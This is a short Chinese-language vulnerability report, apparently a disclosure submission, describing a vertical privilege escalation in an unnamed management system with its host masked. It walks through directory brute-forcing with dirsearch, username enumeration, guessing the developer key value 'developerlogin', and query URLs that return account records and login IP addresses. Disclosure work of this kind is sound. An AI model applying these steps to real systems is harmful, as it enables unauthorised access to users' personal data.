某管理系统存在垂直越权为管理员漏洞

Url:http://****.com/

通过dirsearch得到后台开发者路径

后台开发登录后台之间填写Url进入到开发者功能区域:

http://****.com/developerlogin/

对存在的用户进行字典枚举出三名用户，但没有获取到密码

重新截获/deverloplogin/页面，发现payload:key=*****

测试得知三种点击查询有三种接口查询功能：

信息查询

http://****.com/developer?key=****&act=accountQuery&accountQueryType=mobilePhone&accountQueryValue=

http://****.com/developer?key=****&act=accountQuery&accountQueryType=accountName&accountQueryValue=

http://****.com/developer?key=****&act=accountQuery&accountQueryType=accountId&accountQueryValue

登记信息查询

http://****.com/developer?key=****&act=accountLoginQuery&accountQueryType=mobilePhone&accountQueryValue=&loginStartTime=&loginEndTime=

http://****.com/developer?key=****&act=accountLoginQuery&accountQueryType=accountName&accountQueryValue=&loginStartTime=&loginEndTime=

http://****.com/developer?key=****&act=accountLoginQuery&accountQueryType=accountId&accountQueryValue=&loginStartTime=&loginEndTime=

经纪人查询同理

http://****.com/developer?key=****&act=brokerQuery&accountQueryType=accountName&accountQueryValue=

经过不断尝试key=****修改后

尝试key=developerlogin得到管理员（开发者）查询权限，垂直越权，进行管理员全局查询。

网页修改url查看存在的11用户：

http://****.com/developer?key=developerlogin&act=accountLoginQuery&accountQueryType=accountId&accountQueryValue=123&loginStartTime=20150101&loginEndTime=20210101

获取2015-2021的登录ip地址

http://****.com/developer?key=developerlogin&act=brokerQuery&accountQueryType=accountId&accountQueryValue=123456

提交结果：